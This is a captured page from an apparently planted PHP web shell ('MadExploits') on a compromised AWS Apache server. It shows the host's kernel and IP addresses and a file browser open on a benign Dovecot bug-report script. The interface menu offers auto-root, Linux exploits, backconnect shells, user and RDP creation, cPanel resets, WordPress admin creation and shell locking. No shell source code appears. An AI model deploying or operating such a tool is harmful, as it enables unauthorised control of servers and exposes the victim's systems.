Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.142.243.141
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
bug /
dovecot-core /
[ HOME SHELL ]
Name
Size
Permission
Action
control
204
B
-rw-r--r--
script
562
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script
#!/bin/bash set -e pecho() { echo "$@" echo "$@"|sed 's/./-/g' } if [ -x /usr/bin/doveconf ] then echo cat <<-EOF You can append "doveconf -n" output to the bug report. It will help the maintainers to better understand your configuration. It normally doesn't contain any sensitive information, but you should review it before sending. EOF echo yesno "Do you want to append \"doveconf -n\" output to your bug report? " yep if [ "$REPLY" == yep ] then echo >&3 pecho "dovecot configuration" >&3 /usr/bin/doveconf -n >&3 fi fi
Close